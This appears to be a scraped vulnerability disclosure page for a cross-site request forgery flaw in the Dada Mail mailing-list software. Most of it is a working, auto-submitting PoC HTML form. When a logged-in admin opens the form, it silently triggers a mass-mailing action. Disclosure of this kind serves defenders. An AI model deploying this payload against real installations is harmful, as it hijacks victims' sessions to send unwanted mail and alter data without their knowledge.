Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrAmammad4F5C1C54-DFB5-4278-A39A-82AE6675A6D7
HistorySep 12, 2021 - 11:23 p.m.

Cross-Site Request Forgery (CSRF) in justingit/dada-mail

2021-09-1223:23:52
amammad
www.huntr.dev
3
JSON

✍️ Description

Attacker able to Send any Mass mailing with CSRF attack.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.

Or users with low level privilege can send a link to other users and admins with higher privilege and then their malicious request will be executed without that victim users and admins be aware about that.

🕵️‍♂️ Proof of Concept

1.First of all admin or user with right privileges already should be logged in any browser.

2.Open the PoC.html (it is auto-submit).

3.Here A mass mailing with Preheader aaa and content bbb will be send after the PoC.html file opened.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dadademo.com/cgi-bin/dada/mail.cgi" method="POST">
      <input type="hidden" name="list" value="demolist" />
      <input type="hidden" name="sched_flavor" value="" />
      <input type="hidden" name="flavor" value="send_email" />
      <input type="hidden" name="support_files_url" value="https://dadademo.com/dada_mail_support_files" />
      <input type="hidden" name="draft_alert" value="0" />
      <input type="hidden" name="draft_id" value="441" />
      <input type="hidden" name="save_draft_role" value="draft" />
      <input type="hidden" name="draft_role" value="draft" />
      <input type="hidden" name="schedule_html_body_checksum" value="" />
      <input type="hidden" name="feed_url_most_recent_entry" value="" />
      <input type="hidden" name="schedule_type" value="single" />
      <input type="hidden" name="schedule_single_displaydatetime" value="" />
      <input type="hidden" name="schedule_recurring_displaydatetime_start" value="" />
      <input type="hidden" name="schedule_recurring_displaydatetime_end" value="" />
      <input type="hidden" name="schedule_recurring_display_hms" value="00:00" />
      <input type="hidden" name="schedule_recurring_days" value="1" />
      <input type="hidden" name="schedule_recurring_days" value="2" />
      <input type="hidden" name="schedule_recurring_days" value="3" />
      <input type="hidden" name="schedule_recurring_days" value="4" />
      <input type="hidden" name="schedule_recurring_days" value="5" />
      <input type="hidden" name="schedule_recurring_days" value="6" />
      <input type="hidden" name="schedule_recurring_days" value="7" />
      <input type="hidden" name="schedule_recurring_only_mass_mail_if_primary_diff" value="1" />
      <input type="hidden" name="Reply-To" value="" />
      <input type="hidden" name="X-Priority" value="3" />
      <input type="hidden" name="Subject" value="<!-- tmpl_var list_settings.list_name --> Message" />
      <input type="hidden" name="X-Preheader" value="aaa" />
      <input type="hidden" name="content_from" value="content_from_textarea" />
      <input type="hidden" name="html_message_body" value="<html>
<head>
	<title></title>
</head>
<body>
<p>aaa</p>
</body>
</html>
" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="crop_html_content_selector_type" value="id" />
      <input type="hidden" name="crop_html_content_selector_label" value="" />
      <input type="hidden" name="feed_url" value="" />
      <input type="hidden" name="feed_url_content_type" value="summary" />
      <input type="hidden" name="feed_url_max_entries" value="5" />
      <input type="hidden" name="feed_url_pre_html" value="" />
      <input type="hidden" name="feed_url_post_html" value="" />
      <input type="hidden" name="text_message_body" value="" />
      <input type="hidden" name="plaintext_url" value="" />
      <input type="hidden" name="plaintext_content_from" value="auto" />
      <input type="hidden" name="rich_filemanager_enabled" value="1" />
      <input type="hidden" name="rich_filemanager_url" value="https://dadademo.com/dada_mail_support_files/RichFilemanager" />
      <input type="hidden" name="rich_filemanager_upload_dir" value="/home8/dadademo/public_html/dada_mail_support_files/file_uploads" />
      <input type="hidden" name="rich_filemanager_upload_url" value="https://dadademo.com/dada_mail_support_files/file_uploads" />
      <input type="hidden" name="SUPPORT_FILES_URL" value="https://dadademo.com/dada_mail_support_files" />
      <input type="hidden" name="attachment1" value="" />
      <input type="hidden" name="attachment2" value="" />
      <input type="hidden" name="attachment3" value="" />
      <input type="hidden" name="attachment4" value="" />
      <input type="hidden" name="attachment5" value="" />
      <input type="hidden" name="layout" value="default" />
      <input type="hidden" name="local_archive_options_present" value="1" />
      <input type="hidden" name="archive_message" value="1" />
      <input type="hidden" name="backdate_datetime" value="2021-09-12 22:37:41" />
      <input type="hidden" name="email.operator" value="LIKE" />
      <input type="hidden" name="email.value" value="" />
      <input type="hidden" name="subscriber.timestamp.rangestart" value="" />
      <input type="hidden" name="subscriber.timestamp.rangeend" value="" />
      <input type="hidden" name="mass_mailing_utm_domains" value="" />
      <input type="hidden" name="mass_mailing_utm_source" value="Pro Dada" />
      <input type="hidden" name="mass_mailing_utm_medium" value="email" />
      <input type="hidden" name="mass_mailing_utm_term" value="" />
      <input type="hidden" name="mass_mailing_utm_content" value="" />
      <input type="hidden" name="mass_mailing_utm_name" value="" />
      <input type="hidden" name="test_recipient_type" value="from_textbox" />
      <input type="hidden" name="test_recipients" value="" />
      <input type="hidden" name="process" value="save_as_draft" />
      <input type="hidden" name="json" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframe )

💥 Impact

This vulnerability is capable of make medium damage on availability and integrity of system.

Fix

You should set a CSRF token for each user/form.

JSON